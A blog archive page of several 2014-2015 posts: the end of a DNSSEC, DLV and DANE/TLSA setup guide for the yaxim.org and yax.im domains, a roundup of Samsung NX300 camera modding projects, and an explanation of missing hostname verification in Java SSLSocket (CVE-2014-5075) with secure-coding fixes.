Whenever you update the NSEC3PARAM value, your zone will be re-signed and re-published. That means you can change the iteration count and salt value later on, if the need should arise.

Configuring the DS (Delegation Signer) Record for yaxim.org

If your domain is on an already-signed TLD (like yaxim.org on .org), you need to establish a trust link from the .org zone to your domain's signature keys (the KSK, to be precise). For this purpose, the delegation signer (DS) record type has been created.

A DS record is a signed record in the parent domain (.org) that identifies a valid key for a given sub-domain (yaxim.org). Multiple DS records can coexist to allow key rollover. If you are running an important service, you should create a second KSK, store it in a safe place, and add its DS in addition to the currently used one. Should your primary name server go up in flames, you can recover without waiting for the domain registrar to update your records.

Exporting the DS Record

To obtain the DS record, BIND comes with the dnssec-dsfromkey tool. Just pipe all your keys into it, and it will output DS records for the KSKs. We do not want SHA-1 records any more, so we pass -2 as well to get the SHA-256 record:

$ dig @127.0.0.1 DNSKEY yaxim.org | dnssec-dsfromkey -f - -2 yaxim.org
yaxim.org. IN DS 42199 8 2 35E4E171FC21C6637A39EBAF0B2E6C0A3FE92E3D2C983281649D9F4AE3A42533

This line is what you need to submit to your domain registrar (using their web interface or by means of a support ticket). The information contained is:

  • key tag: 42199 (this is just a numeric ID for the key, useful for key rollovers)
  • signature algorithm: 8 (RSA / SHA-256)
  • DS digest type: 2 (SHA-256)
  • hash value: 35E4E171...E3A42533

However, some registrars insist on creating the DS record themselves, and require you to send in your DNSKEY. We only need to give them the KSK (type 257), so we filter the output accordingly:

$ dig @127.0.0.1 DNSKEY yaxim.org | grep 257
yaxim.org.              86400   IN      DNSKEY  257 3 8
    AwEAAcDCzsLhZT849AaG6gbFzFidUyudYyq6NHHbScMl+PPfudz5pCBt
    G2AnDoqaW88TiI9c92x5f+u9Yx0fCiHYveN8XE2ed/IQB3nBW9VHiGQC
    CliM0yDxCPyuffSN6uJNVHPEtpbI4Kk+DTcweTI/+mtTD+sC+w/CST/V
    NFc5hV805bJiZy26iJtchuA9Bx9GzB2gkrdWFKxbjwKLF+er2Yr5wHhS
    Ttmvntyokio+cVgD1UaNKcewnaLS1jDouJ9Gy2OJFAHJoKvOl6zaIJuX
    mthCvmohlsR46Sp371oS79zrXF3LWc2zN67T0fc65uaMPkeIsoYhbsfS
    /aijJhguS/s=

Validation of the Trust Chain

As soon as the record is updated, you can check the trustworthiness of your domain. Unfortunately, all of the available command-line tools suck. One of the least-sucking ones is drill from ldns. It still needs a root.key file that contains the officially trusted DNSSEC key for the . (root) domain. In Debian, the dns-root-data package places it under /usr/share/dns/root.key. Let's drill our domain name with DNSSEC (-D), tracing from the root zone (-T), quietly (-Q):

$ drill -DTQ -k /usr/share/dns/root.key yaxim.org
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] org. 86400 IN DS 21366 7 1 e6c1716cfb6bdc84e84ce1ab5510dac69173b5b2 
org. 86400 IN DS 21366 7 2 96eeb2ffd9b00cd4694e78278b5efdab0a80446567b69f634da078f0d90f01ba 
;; Domain: org.
[T] org. 900 IN DNSKEY 257 3 7 ;{id = 9795 (ksk), size = 2048b}
org. 900 IN DNSKEY 256 3 7 ;{id = 56198 (zsk), size = 1024b}
org. 900 IN DNSKEY 256 3 7 ;{id = 34023 (zsk), size = 1024b}
org. 900 IN DNSKEY 257 3 7 ;{id = 21366 (ksk), size = 2048b}
[T] yaxim.org. 86400 IN DS 42199 8 2 35e4e171fc21c6637a39ebaf0b2e6c0a3fe92e3d2c983281649d9f4ae3a42533 
;; Domain: yaxim.org.
[T] yaxim.org. 86400 IN DNSKEY 257 3 8 ;{id = 42199 (ksk), size = 2048b}
yaxim.org. 86400 IN DNSKEY 256 3 8 ;{id = 6384 (zsk), size = 2048b}
[T] yaxim.org.  3600    IN  A   83.223.75.29
;;[S] self sig OK; [B] bogus; [T] trusted

The above output traces from the initially trusted . key to org, then to yaxim.org and determines that yaxim.org is properly DNSSEC-signed and therefore trusted ([T]). This is already a big step, but the tool lacks some color, and it does not allow to explicitly query the domain's name servers (unless they are open resolvers), so you can't test your config prior to going live.

To get a better view of our DNSSEC situation, we can query some online services:

Ironically, neither DNSViz nor Verisign support encrypted connections via HTTPS, and Lutz' livetest is using an untrusted root.

Enabling DNSSEC Look-aside Validation for yax.im

Unfortunately, we can not do the same with our short and shiny yax.im domain. If we try to drill it, we get the following:

$ drill -DTQ -k /usr/share/dns/root.key yax.im
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] Existence denied: im. DS
;; Domain: im.
;; No DNSKEY record found for im.
;; No DS for yax.im.;; Domain: yax.im.
[S] yax.im. 86400 IN DNSKEY 257 3 8 ;{id = 17389 (ksk), size = 2048b}
yax.im. 86400 IN DNSKEY 256 3 8 ;{id = 24870 (zsk), size = 2048b}
[S] yax.im. 3600    IN  A   83.223.75.29
;;[S] self sig OK; [B] bogus; [T] trusted

There are two pieces of relevant information here:

  • [T] Existence denied: im. DS - the top-level zone assures that .IM is not DNSSEC-signed (it has no DS record).
  • [S] yax.im. 3600 IN A 83.223.75.29 - yax.im is self-signed, providing no way to check its authenticity.

The .IM top-level domain for Isle of Man is operated by Domicilium. A friendly support request reveals the following:

Unfortunately there is no ETA for DNSSEC support at this time.

That means there is no way to create a chain of trust from the root zone to yax.im.

Fortunately, the desingers of DNSSEC anticipated this problem. To accelerate adoption of DNSSEC by second-level domains, the concept of look-aside validation was introduced in 2006. It allows to use an alternative trust root if the hierarchical chaining is not possible. The ISC is even operating such an alternative trust root. All we need to do is to register our domain with them, and add them to our resolvers (because they aren't added by default).

After registering with DLV, we are asked to add our domain with its respective KSK domain key entry. To prove domain and key ownership, we must further create a signed TXT record under dlv.yax.im with a specific value:

dlv.yax.im. IN TXT "DLV:1:fcvnnskwirut"

Afterwards, we request DLV to check our domain. It queries all of the domains' DNS servers for the relevant information and compares the results. Unfortunately, our domain fails the check:

FAILURE 69.36.225.255 has extra: yax.im. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE 69.36.225.255 has extra: yax.im. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE 69.36.225.255 missing: YAX.IM. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE 69.36.225.255 missing: YAX.IM. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE This means your DNS servers are out of sync. Either wait until the DNSKEY data is the same, or fix your server's contents.

This looks like a combination of two different issues:

  1. A part of our name servers is returning YAX.IM when asked for yax.im.
  2. The DLV script is case-sensitive when it comes to domains.

Problem #1 is officially not a problem. DNS is case-insensitive, and therefore all clients that fail to accept YAX.IM answers to yax.im requests are broken. In practice, this hits not only the DLV resolver (problem #2), but also the resolver code in Erlang, which is used in the widely-deployed ejabberd XMPP server.

While we can't fix all the broken servers out there, #2 has been reported and fixed, and hopefully the fix has been rolled out to production already. Still, issue #1 needs to be solved.

It turns out that it is caused by case insensitive response compression. You can't make this stuff up! Fortunately, BIND 9.9.6 added the no-case-compress ACL, so "all you need to do" is to upgrade BIND and enable that shiny new feature.

After checking and re-checking the dlv.yax.im TXT record with DLV, there is finally progress:

SUCCESS DNSKEY signatures validated.
...
SUCCESS COOKIE: Good signature on TXT response from <NS IP>
SUCCESS <NS IP> has authentication cookie DLV:1:fcvnnskwirut
...
FINAL_SUCCESS Success.

After your domain got validated, it will receive its look-aside validation records under dlv.isc.org:

$ dig +noall +answer DLV yax.im.dlv.isc.org
yax.im.dlv.isc.org. 3451    IN  DLV 17389 8 2 C41AFEB57D71C5DB157BBA5CB7212807AB2CEE562356E9F4EF4EACC2 C4E69578
yax.im.dlv.isc.org. 3451    IN  DLV 17389 8 1 8BA3751D202EF8EE9CE2005FAF159031C5CAB68A

This looks like a real success. Except that nobody is using DLV in their resolvers by default, and DLV will stop operations in 2017.

Until then, you can enable look-aside validation in your BIND and Unbound resolvers.

Lutz' livetest service supports checking DLV-backed domains as well, so let's verify our configuration:

Creating TLSA Records for HTTP and SRV

Now that we have created keys, signed our zones and established trust into them from the root (more or less), we can put more sensitive information into DNS, and our users can verify that it was actually added by us (or one of at most two or three governments: the US, the TLD holder, and where your nameservers are hosted).

This allows us to add a second, independent, trust root to the TLS certificates we use for our web server (yaxim.org) as well as for our XMPP server, by means of TLSA records.

These record types are defined in RFC 6698 and consist of the following pieces of information:

  • domain name (i.e. www.yaxim.org)
  • certificate usage (is it a CA or a server certificate, is it signed by a "trusted" Root CA?)
  • selector + matching type + certificate association data (the actual certificate reference, encoded in one of multiple possible forms)

Domain Name

The domain name is the hostname in the case of HTTPS, but it's slightly more complicated for the XMPP SRV record, because there we have the service domain (yax.im), the conference domain (chat.yax.im) and the actual server domain name (xmpp.yaxim.org).

The behavior for SRV TLSA handling is defined in RFC 7673, published as Proposed Standard in October 2015. First, the client must validate that the SRV response for the service domain is properly DNSSEC-signed. Only then the client can trust that the server named in the SRV record is actually responsible for the service.

In the next step, the client must ensure that the address response (A for IPv4 and AAAA for IPv6) is DNSSEC-signed as well, or fall back to the next SRV record.

If both the SRV and the A/AAAA records are properly signed, the client must do a TLSA lookup for the SRV target (which is _5222._tcp.xmpp.yaxim.org for our client users, or _5269._tcp.xmpp.yaxim.org for other XMPP servers connecting to us).

Certificate Usage

The certificate usage field can take one of four possible values. Translated into English, the possibilities are:

  1. "trusted" CA - the provided cert is a CA cert that is trusted by the client, and the server certificate must be signed by this CA. We could use this to indicate that our server only will use StartSSL-issued certificates.
  2. "trusted" server certificate - the provided cert corresponds to the certificate returned over TLS and must be signed by a trusted Root CA. We will use this to deliver our server certificate.
  3. "untrusted" CA - the provided CA certificate must be the one used to sign the server's certificate. We could roll out a private CA and use this type, but it would cause issues with non-DNSSEC clients.
  4. "untrusted" server certificate - the provided certificate must be the same as returned by the server, and no Root CA trust checks shall be performed.

The Actual Certificate Association

Now that we know the server name for which the certificate is valid and the type of certificate and trust checks to perform, we need to store the actual certificate reference. Three fields are used to encode the certificate reference.

The selector defines whether the full certificate (0) or only the SubjectPublicKeyInfo field (1) is referenced. The latter allows to get the server key re-signed by a different CA without changing the TLSA records. The former could be theoretically used to put the full certificate into DNS (a rather bad idea for TLS, but might be interesting for S/MIME certs).

The matching type field defines how the "selected" data (certificate or SubjectPublicKeyInfo) is stored:

  1. exact match of the whole "selected" data
  2. SHA-256 hash of the "selected" data
  3. SHA-512 hash of the "selected" data

Finally, the certificate association data is the certificate/SubjectPublicKeyInfo data or hash, as described by the previous fields.

Putting it all Together

A good configuration for our service is a record based on a CA-issued server certificate (certificate usage 1), with the full certificate (selector 0) hashed via SHA-256 (matching type 1). We can obtain the required association data using OpenSSL command line tools:

openssl x509 -in yaxim.org-2014.crt -outform DER | openssl sha256
(stdin)= bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9

Taken together, this results in the following entries for HTTPS on yaxim.org and www.yaxim.org:

_443._tcp.yaxim.org     IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
_443._tcp.www.yaxim.org IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9

This is also the SHA-256 fingerprint you can see in your web browser.

For the XMPP part, we need to add TLSA records for the SRV targets (_5222._tcp.xmpp.yaxim.org for clients and _5269._tcp.xmpp.yaxim.org for servers). There should be no need to make TLSA records for the service domain (_5222._tcp.yax.im), because a modern client will always try to resolve SRV records, and no DNSSEC validation will be possible if that fails.

Here, we take the SHA-256 sum of the yax.im certificate we obtained from StartSSL, and create two records with the same type and format as above:

_5222._tcp.xmpp.yaxim.org IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836
_5269._tcp.xmpp.yaxim.org IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836

These fields will be used by DNSSEC-enabled clients to verify the TLS certificate presented by our XMPP service.

Replacing the Server Certificate

Now that the TLSA records are in place, it is not as easy to replace your server certificate as it was before, because the old one is now anchored in DNS.

You need to perform the following steps in order to ensure that all clients will be able to connect at any time:

  1. Obtain the new certificate
  2. Create a second set of TLSA records, for the new certificate (keep the old one in place)
  3. Wait for the configured DNS time-to-live to ensure that all users have received both sets of TLSA records
  4. Replace the old certificate on the server with the new one
  5. Remove the old TLSA records

If you fail to add the TLSA records and wait the DNS TTL, some clients will have cached a copy of only the old TLSA records, so they will reject your new server certificate.

Conclusion

DANE for XMPP is a chicken-and-egg problem. As long as there are no servers, it will not be implemented in the clients, and vice versa. However, the (currently unavailable) xmpp.net XMPP security analyzer is checking the DANE validation status, and GSoC 2015 brought us DNSSEC support in minidns, which soon will be leveraged in Smack-based XMPP clients.

With this (rather long) post covering all the steps of a successful DNSSEC implementation, including the special challenges of .IM domains, I hope to pave the way for more XMPP server operators to follow.

Enabling DNSSEC and DANE provides an improvement over the rather broken Root CA trust model, however it is not without controversy. tptacek makes strong arguments against DNSSEC, because it is using outdated crypto and because it doesn't completely solve the government-level MitM problem. Unfortunately, his proposal to "do nothing" will not improve the situation, and the only positive contribution ("use TACK!") has expired in 2013.

Finally, one last technical issue not covered by this post is periodic key rollover; this will be covered by a separate post eventually.

Comments on HN

Posted 2015-10-16 17:55 Tags:

This is the third post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we have analyzed how the camera is interacting with the outside world using NFC and WiFi. The second one showed a method to gain a remote root shell, and it spawned a number of interesting projects. This post is a reference collection of these projects, and a call for collaboration.

Samsung NX300 Firmware Update

First, I want to thank Samsung for fixing the most serious security problems in the NX300 firmware. As of firmware version 1.41, the X server is closed down and there is an option to encrypt the WiFi network spawned by the camera with WPA2:

[v1.41]
1.Add Wi-Fi Privacy Lock function 2.Revision Open Source Licenses

Unfortunately, the provided 8-digit PIN can be cracked in less than one hour using pyrit on a middle-class GPU. While this is far from good security, it requires at least some dedication from the attacker.

Even more unfortunately, Samsung removed autoexec.sh execution from the NX300M firmware starting with (or after) 1.11. Dear Samsung engineers, if you are reading this: please add it back! Executing code from the SD card (without modifying the firmware image) is a great opportunity, not a security problem! Most of the mods discussed in this post are leveraging that functionality in a creative way!

Automatic Photo Backups

Markus A. Kuppe has written a tutorial for auto-backups of the NX300 using an ftp client on the camera and a Raspberry Pi ftp server. One interesting bit of information is how to make the camera auto-connect to WiFi whenever it is turned on, using a custom wpa_supplicant.conf and DBus:

cp /mnt/mmc/wpa_supplicant.conf /tmp/
/usr/bin/wlan.sh start NL 0x8210
/usr/sbin/connmand -W nl80211 -r
/usr/sbin/net-config
sleep 2
dbus-send --system --type=method_call --print-reply --dest=net.connman \
    /net/connman/service/wifi_a0219572b25b_7777772e6c656d6d737465722e6465_managed_psk \
    net.connman.Service.Connect

Jonathan Dieter created another backup mechanism using SCP and published the nx300m-autobackup source code. Well done!

Additional Kernel Modules

Markus also provided a short write-up on compiling additional kernel modules, which should allow us to extend the camera's functionality without re-flashing the firmware.

Crypto Photography

The most interesting idea, however, was envisioned by Doug Hickok. He modified the firmware to auto-encrypt photographs using public key cryptography. This allows for very interesting use cases like letting a professional photographer take pictures without allowing him to keep a copy, or for investigative journalists to hide their data tracks.

In the current implementation the pictures are first stored to the SD card and then encrypted and deleted, allowing for undelete attacks. Do not use it in production yet. With some more tweaking, however, it should be possible to make this firmware actually deliver the security promise.

Announcement: Samsung NX Hacks

Seeing how there is a (yet small) community of tinkerers around the NX300 camera, and with the knowledge that a whole range of Samsung NX cameras comes with Tizen-based firmware (NX1, NX200, NX2000, NX300M, ...?), the author has created a repository and a Wiki on GitHub.

Feel free to contribute to the wiki or the project - every input is welcome, starting from transferring information from the blog posts linked above into a more structured form in the wiki, and up to creating firmware modifications to allow for exciting new features.

Hack on!


Full series:

Posted 2015-01-29 17:30 Tags:

Internet security is hard. TLS is almost impossible. Implementing TLS correctly in Java is Nightmare! While the higher-level HttpsURLConnection and Apache's DefaultHttpClient do it (mostly) right, direct users of Java SSL sockets (SSLSocket/ SSLEngine, SSLSocketFactory) are left exposed to Man-in-the-Middle attacks, unless the application manually checks the hostname against the certificate or employs certificate pinning.

The SSLSocket documentation claims that the socket provides "Integrity Protection", "Authentication", and "Confidentiality", even against active wiretappers. That impression is underscored by rigorous certificate checking performed when connecting, making it ridiculously hard to run development/test installations. However, these checks turn out to be completely worthless against active MitM attackers, because SSLSocket will happily accept any valid certificate (like for a domain owned by the attacker). Due to this, many applications using SSLSocket can be attacked with little effort.

This problem has been written about, but CVE-2014-5075 shows that it can not be stressed enough.

Affected Applications

This problem affects applications that make use of SSL/TLS, but not HTTPS. The best candidates to look for it are therefore clients for application-level protocols like e-mail (POP3/IMAP), instant messaging (XMPP), file transfer (FTP). CVE-2014-5075 is the respective vulnerability of the Smack XMPP client library, so this is a good starting point.

XMPP Clients

XMPP clients based on Smack (which was fixed on 2014-07-22):

Other XMPP clients:

Not Vulnerable Applications

The following applications have been checked as well, and contained code to compensate for SSLSockets shortcomings:

  • Jitsi (OSS conferencing client)
  • K9-Mail (Android e-Mail client)
  • Xabber (Based on Smack, but using its own hostname verification)

Background: Security APIs in Java

The amount of vulnerable applications can be easily explained after a deep dive into the security APIs provided by Java (and its offsprings). Therefore, this section will handle the dirty details of trust (mis)management in the most important implementations: old Java, new Java, Android and in Apache's HttpClient.

Java SE up to and including 1.6

When network security was added into Java 1.4 with the JSSE (and we all know how well security-as-an-afterthought works), two distinct APIs have been created for certificate verification and for hostname verification. The rationale for that decision was probably that the TLS/SSL handshake happens at the socket layer, whereas the hostname verification depends on the application-level protocol (HTTPS at that time). Therefore, the X509TrustManager class for certificate trust checks was integrated into the low-level SSLSocket and SSLEngine classes, whereas the HostnameVerifier API was only incorporated into the HttpsURLConnection.

The API design was not very future-proof either: X509TrustManager's checkClientTrusted() and checkServerTrusted() methods are only passed the certificate and authentication type parameters. There is no reference to the actual SSL connection or its peer name. The only workaround to allow hostname verification through this API is by creating a custom TrustManager for each connection, and storing the peer's hostname in it. This is neither elegant nor does it scale well with multiple connections.

The HostnameVerifier on the other hand has access to both the hostname and the session, making a full verification possible. However, only HttpsURLConnection is making use of a HostnameVerifier (and is only asking it if it determines a mismatch between the peer and its certificate, so the default HostnameVerifier always fails).

Besides of the default HostnameVerifier being unusable due to always failing, the API has another subtle surprise: while the TrustManager methods fail by throwing a CertificateException, HostnameVerifier.verify() simply returns false if verification fails.

As the API designers realized that users of the raw SSLSocket might fall into a certificate verification trap set up by their API, they added a well-buried warning into the JSSE reference guide for Java 5, which I am sure you have read multiple times (or at least printed it and put it under your pillow):

IMPORTANT NOTE: When using raw SSLSockets/SSLEngines you should always check the peer's credentials before sending any data. The SSLSocket/SSLEngine classes do not automatically verify, for example, that the hostname in a URL matches the hostname in the peer's credentials. An application could be exploited with URL spoofing if the hostname is not verified.

Of course, URLs are only a thing in HTTPS, but you get the point... provided that you actually have read the reference guide... up to this place. If you only read the SSLSocket marketing reference article, and thought that you are safe because it does not mention any of the pitfalls: shame on you!

And even if you did read the warning, there is no hint about how to implement the peer credentials checks. There is no API class that would perform this tedious and error-prone task, and implementing it yourself requires a Ph.D. degree in rocket surgery, as well as deep knowledge of some related Internet standardsx.

x Side note: even if you do not believe SSL conspiracy theories, or theories confirmed facts about the deliberate manipulation of Internet standards by NSA and GCHQ, there is one prominent example of how the implementation of security mechanisms can be aggravated by adding complexity - the title of RFC 6125: "Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)".

Apache HttpClient

The Apache HttpClient library is a full-featured HTTP client written in pure Java, adding flexibility and functionality in comparison to the default HTTP implementation.

The Apache library developers came up with their own API interface for hostname verification, X509HostnameVerifier, that also happens to incorporate Java's HostnameVerifier interface. The new methods added by Apache are expected to throw SSLException when verification fails, while the old method still returns true or false, of course. It is hard to tell if this interface mixing is adding confusion, or reducing it. One way or the other, it results in the appropriate glue code:

public final boolean verify(String host, SSLSession session) {
    try {
        Certificate[] certs = session.getPeerCertificates();
        X509Certificate x509 = (X509Certificate) certs[0];
        verify(host, x509);
        return true;
    }
    catch(SSLException e) {
        return false;
    }
}

Based on that interface, AllowAllHostnameVerifier, BrowserCompatHostnameVerifier, and StrictHostnameVerifier were created, which can actually be plugged into anything expecting a plain HostnameVerifier. The latter two also actually perform hostname verification, as opposed to the default verifier in Java, so they can be used wherever appropriate. Their difference is:

The only difference between BROWSER_COMPATIBLE and STRICT is that a wildcard (such as "*.foo.com") with BROWSER_COMPATIBLE matches all subdomains, including "a.b.foo.com".

If you can make use of Apache's HttpClient library, just plug in one of these verifiers and have a happy life:

sslSocket = ...;
sslSocket.startHandshake();
HostnameVerifier verifier = new StrictHostnameVerifier();
if (!verifier.verify(serviceName, sslSocket.getSession())) {
    throw new CertificateException("Server failed to authenticate as " + serviceName);
}
// NOW you can send and receive data!

Android

Android's designers must have been well aware of the shortcomings of the Java implementation, and the problems that an application developer might encounter when testing and debugging. They created the SSLCertificateSocketFactory class, which makes a developer's life really easy:

  1. It is available on all Android devices, starting with API level 1.

  2. It comes with appropriate warnings about its security parameters and limitations:

    Most SSLSocketFactory implementations do not verify the server's identity, allowing man-in-the-middle attacks. This implementation does check the server's certificate hostname, but only for createSocket variants that specify a hostname. When using methods that use InetAddress or which return an unconnected socket, you MUST verify the server's identity yourself to ensure a secure connection.

  3. It provides developers with two easy ways to disable all security checks for testing purposes: a) a static getInsecure() method (as of API level 8), and b)

    On development devices, "setprop socket.relaxsslcheck yes" bypasses all SSL certificate and hostname checks for testing purposes. This setting requires root access.

  4. Uses of the insecure instance are logged via adb:

    Bypassing SSL security checks at caller's request
    

    Or, when the system property is set:

    *** BYPASSING SSL SECURITY CHECKS (socket.relaxsslcheck=yes) ***
    

Some time in 2013, a training article about Security with HTTPS and SSL was added, which also features its own section for "Warnings About Using SSLSocket Directly", once again explicitly warning the developer:

Caution: SSLSocket does not perform hostname verification. It is up the your app to do its own hostname verification, preferably by calling getDefaultHostnameVerifier() with the expected hostname. Further beware that HostnameVerifier.verify() doesn't throw an exception on error but instead returns a boolean result that you must explicitly check.

Typos aside, this is very true advice. The article also covers other common SSL/TLS related problems like certificate chaining, self-signed certs and SNI. A must read! The fact that it does not mention the SSLCertificateSocketFactory is only a little snag.

Java 1.7+

As of Java 1.7, there is a new abstract class X509ExtendedTrustManager that finally unifies the two sides of certificate verification:

Extensions to the X509TrustManager interface to support SSL/TLS connection sensitive trust management.

To prevent man-in-the-middle attacks, hostname checks can be done to verify that the hostname in an end-entity certificate matches the targeted hostname. TLS does not require such checks, but some protocols over TLS (such as HTTPS) do. In earlier versions of the JDK, the certificate chain checks were done at the SSL/TLS layer, and the hostname verification checks were done at the layer over TLS. This class allows for the checking to be done during a single call to this class.

This class extends the checkServerTrusted and checkClientTrusted methods with an additional parameter for the socket reference, allowing the TrustManager to obtain the hostname that was used for the connection, thus making it possible to actually verify that hostname.

To retrofit this into the old X509TrustManager interface, all instances of X509TrustManager are internally wrapped into an AbstractTrustManagerWrapper that performs hostname verification according to the socket's SSLParameters. All this happens transparently, all you need to do is to initialize your socket with the hostname and then set the right params:

SSLParameters p = sslSocket.getSSLParameters();
p.setEndpointIdentificationAlgorithm("HTTPS");
sslSocket.setSSLParameters(p);

If you do not set the endpoint identification algorithm, the socket will behave in the same way as in earlier versions of Java, accepting any valid certificate.

However, if you do run the above code, the certificate will be checked against the IP address or hostname that you are connecting to. If the service you are using employs DNS SRV, the hostname (the actual machine you are connecting to, e.g. "xmpp-042.example.com") might differ from the service name (what the user entered, like "example.com"). However, the certificate will be issued for the service name, so the verification will fail. As such protocols are most often combined with STARTTLS, you will need to wrap your SSLSocket around your plain Socket, for which you can use the following code:

sslSocket = sslContext.getSocketFactory().createSocket(
        plainSocket,
        serviceName, /**< set your service name here */
        plainSocket.getPort(),
        true);
// set the socket parameters here!

API Confusion Conclusion

To summarize the different "platforms":

  • If you are on Java 1.6 or earlier, you are screwed!
  • If you have Android, use SSLCertificateSocketFactory and be happy.
  • If you have Apache HttpClient, add a StrictHostnameVerifier.verify() call right after you connect your socket, and check its return value!
  • If you are on Java 1.7 or newer, do not forget to set the right SSLParameters, or you might still be screwed.

Java SSL In the Literature

There is a large amount of good and bad advice out there, you just need to be a farmer security expert to separate the wheat from the chaff.

Negative Examples

The most expensive advice is free advice. And the Internet is full of it. First, there is code to let Java trust all certificates, because self-signed certificates are a subset of all certificates, obviously. Then, we have a software engineer deliberately disable certificate validation, because all these security exceptions only get into our way. Even after the Snowden revelations, recipes for disabling SSL certificate validation are still written. The suggestions are all very similar, and all pretty bad.

Admittedly, an encrypted but unvalidated connection is still a little bit better than a plaintext connection. However, with the advent of free WiFi networks and SSL MitM software, everybody with a little energy can invade your "secure" connections, which you use to transmit really sensitive information. The effect of this can reach from funny over embarassing and up to life-threatening, if you are a journalist in a crisis zone.

The personal favorite of the author is this SO question about avoiding the certificate warning message in yaxim, which is caused by MemorizingTrustManager. It is especially amusing how the server's domain name is left intact in the screenshot, whereas the certificate checksums and the self-signed indication are blackened.

Fortunately, the situation on StackOverflow has been improving over the years. Some time ago, you were overwhelmed with DO_NOT_VERIFY HostnameVerifiers and all-accepting DefaultTrustManagers, where the authors conveniently forgot to mention that their code turns the big red "security" switch to OFF.

The better answers on StackOverflow at least come with a warning or even suggest certificate pinning.

Positive Examples

In 2012, Kevin Locke has created a proper HostnameVerifier using the internal sun.security.util.HostnameChecker class which seems to exist in Java SE 6 and 7. This HostnameVerifier is used with AsyncHttpClient, but is suitable for other use-cases as well.

Fahl et al. have analyzed the sad state of SSL in Android apps in 2012. Their focus was on HTTPS, where they did find a massive amount of applications deliberately misconfigured to accept invalid or mismatching certificates (probably added during app development). In a 2013 followup, they have developed a mechanism to enable certificate checking and pinning according to special flags in the application manifest.

Will Sargent from Terse Systems has an excellent series of articles on everything TLS, with videos, examples and plentiful background information. ABSOLUTELY MUST SEE!

There is even an excellent StackOverflow answer by Bruno, outlining the proper hostname validation options with Java 7, Android and "other" Java platforms, in a very concise way.

Mitigation Possibilities

So you are an app developer, and you get this pesky CertificateException you could not care less about. What can you do to get rid of it, in a secure way? That depends on your situation.

Cloud-Connected App: Certificate Pinning

If your app is always connecting to known-in-advance servers under you control (like only your company's "cloud"), employ Certificate Pinning.

If you want a cheap and secure solution, create your own Certificate Authority (CA) (and guard its keys!), deploy its certificate as the only trusted CA in the app, and sign all your server keys with it. This approach provides you with the ultimate control over the whole security infrastructure, you do not need to pay certificate extortion fees to greedy CAs, and a compromised CA can not issue certificates that would allow to MitM your app. The only drawback is that you might not be as good as a commercial CA at guarding your CA keys, and these are the keys to your kingdom.

To implement the client side, you need to store the CA cert in a key file, which you can use to create an X509TrustManager that will only accept server certificates signed by your CA:

KeyStore ks = KeyStore.getInstance(KeyStore.getDefaultType());
ks.load(new FileInputStream(keyStoreFile), "keyStorePassword".toCharArray());
TrustManagerFactory tmf = TrustManagerFactory.getInstance("X509");
tmf.init(ks);
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, tmf.getTrustManagers(), new java.security.SecureRandom());
// use 'sc' for your HttpsURLConnection / SSLSocketFactory / ...

If you rather prefer to trust the establishment (or if your servers are to be used by web browsers as well), you need to get all your server keys signed by an "official" Root CA. However, you can still store that single CA into your key file and use the above code. You just won't be able to switch to a different CA later on if they try to extort more money from you.

User-configurable Servers (a.k.a. "Private Cloud"): TOFU/POP

In the context of TLS, TOFU/POP is neither vegetarian music nor frozen food, but stands for "Trust on First Use / Persistence of Pseudonymity".

The idea behind TOFU/POP is that when you connect to a server for the first time, your client stores its certificate, and checks it on each subsequent connection. This is the same mechanism as used in SSH. If you had no evildoers between you and the server the first time, later MitM attempts will be discovered. OpenSSH displays the following on a key change:

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.

In case you fell victim to a MitM attack the first time you connected, you will see the nasty warning as soon as the attacker goes away, and can start investigating. Your information will be compromised, but at least you will know it.

The problem with the TOFU approach is that it does not mix well with the PKI infrastructure model used in the TLS world: with TOFU, you create one key when the server is configured for the first time, and that key remains bound to the server forever (there is no concept of key revocation).

With PKI, you create a key and request a certificate, which is typically valid for one or two years. Before that certificate expires, you must request a new certificate (optionally using a new private key), and replace the expiring certificate on the server with the new one.

If you let an application "pin" the TLS certificate on first use, you are in for a surprise within the next year or two. If you "pin" the server public key, you must be aware that you will have to stick to that key (and renew certificates for it) forever. Of course you can create your own, self-signed, certificate with a ridiculously long expiration time, but this practice is frowned upon (for self-signing and long expiration times).

Currently, some ideas exist about how to combine PKI with TOFU, but the only sensible thing that an app can do is to give a shrug and ask the user.

Because asking the user is non-trivial from a background networking thread, the author has developed MemorizingTrustManager (MTM) for Android. MTM is a library that can be plugged into your apps' TLS connections, that leverages the system's ability for certificate and hostname verification, and asks the user if the system does not consider a given certificate/hostname combination as legitimate. Internally, MTM is using a key store where it collects all the certificates that the user has permanently accepted.

Browser

